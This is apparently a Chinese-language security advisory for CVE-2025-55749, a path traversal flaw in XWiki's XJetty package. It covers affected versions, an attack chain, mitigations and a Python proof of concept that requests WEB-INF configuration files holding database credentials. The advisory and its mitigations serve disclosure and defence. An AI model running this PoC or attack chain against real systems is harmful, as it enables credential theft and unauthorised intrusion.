CVE-2025-55749 XWiki XJetty路径遍历导致敏感文件访问

漏洞信息

漏洞编号

CVE-2025-55749

漏洞类型

路径遍历/文件泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

XWiki Platform (XJetty)

漏洞概述

XWiki是一个开源的企业级Wiki软件平台。在16.7.0至16.10.11、17.4.4和17.7.0版本中，使用XWiki Jetty包（XJetty）部署的实例存在严重的安全漏洞。该漏洞源于XJetty配置不当，将webapp目录通过静态资源上下文暴露出来，攻击者可以利用路径遍历技术访问webapp文件夹中的任意文件。由于XWiki的配置文件中通常存储有数据库凭据、加密密钥等敏感信息，攻击者获取这些文件后可能导致严重的横向移动和数据泄露风险。此漏洞无需任何认证即可利用，CVSS评分达到7.5分，属于高危漏洞。建议受影响用户立即升级到官方修复版本。

技术细节

该漏洞的根本原因在于XJetty服务器的静态文件服务配置存在缺陷。在XWiki的Jetty部署模式下，webapp目录被错误地暴露为一个静态资源上下文。攻击者可以通过构造特殊的HTTP请求，利用路径遍历字符（如../）来访问webapp目录之外的敏感文件。典型的攻击路径包括但不限于：访问WEB-INF/web.xml获取应用配置、读取数据库配置文件获取凭据、访问其他包含敏感信息的配置文件。由于请求通过网络发起且无需任何认证，任何能够访问XWiki实例的攻击者都可以实施利用。漏洞影响的是使用官方XJetty打包部署的用户，其他部署方式（如WAR部署在外部Servlet容器）不受影响。

攻击链分析

STEP 1

步骤1

攻击者识别运行XWiki Jetty包（XJetty）的目标服务器，确认版本在受影响范围内（16.7.0-16.10.11、17.4.4、17.7.0）

STEP 2

步骤2

攻击者构造HTTP请求，通过/webapp路径访问敏感文件，利用路径遍历技术（如../）尝试访问WEB-INF目录下的配置文件

STEP 3

步骤3

服务器错误配置允许静态访问webapp目录，攻击者成功获取xwiki.cfg、hibernate.cfg.xml等包含数据库凭据的文件

STEP 4

步骤4

攻击者利用获取的凭据进行横向移动，访问数据库或接管XWiki管理员账户

STEP 5

步骤5

通过XWiki的管理功能执行代码或进一步渗透内网系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

def exploit_cve_2025_55749(target_url):
    """
    CVE-2025-55749 PoC - XWiki XJetty Path Traversal File Access
    This PoC demonstrates accessing sensitive files via path traversal
    """
    
    # Target files to attempt access
    target_files = [
        '/webapp/WEB-INF/web.xml',
        '/webapp/WEB-INF/classes/hibernate.cfg.xml',
        '/webapp/WEB-INF/xwiki.cfg',
        '/webapp/WEB-INF/observation.remote/hessian_config.xml'
    ]
    
    # Common path traversal patterns
    traversal_patterns = [
        '',
        '../',
        '../../',
        '../../../'
    ]
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Testing CVE-2025-55749 - XWiki XJetty Path Traversal\n")
    
    for traversal in traversal_patterns:
        for file_path in target_files:
            url = f"{target_url}{traversal}{file_path}"
            try:
                response = requests.get(url, timeout=10, verify=False)
                if response.status_code == 200 and len(response.content) > 0:
                    print(f"[+] SUCCESS: {url}")
                    print(f"    Status: {response.status_code}")
                    print(f"    Content-Length: {len(response.content)}")
                    # Check for sensitive keywords
                    content = response.text.lower()
                    if any(keyword in content for keyword in ['password', 'credential', 'connection', 'database']):
                        print(f"    [!] Contains potentially sensitive data!")
            except requests.RequestException as e:
                print(f"[-] Error accessing {url}: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://vulnerable-xwiki-host:8080")
        sys.exit(1)
    exploit_cve_2025_55749(sys.argv[1].rstrip('/'))

影响范围

XWiki Platform 16.7.0 - 16.10.11

XWiki Platform 17.4.0 - 17.4.4

XWiki Platform 17.5.0 - 17.7.0

防御指南

临时缓解措施

在无法立即进行版本升级的情况下，建议采取以下临时缓解措施：1) 将XWiki部署方式从XJetty切换到外部Servlet容器（如Tomcat、Jetty或WildFly）；2) 在Web服务器层面配置访问控制，阻止对/webapp/WEB-INF等敏感路径的访问；3) 限制XWiki实例的网络暴露，仅允许受信任的IP访问；4) 定期轮换数据库密码和其他凭据，即使它们可能已被泄露；5) 启用Web应用防火墙（WAF）规则来检测和阻止路径遍历攻击尝试。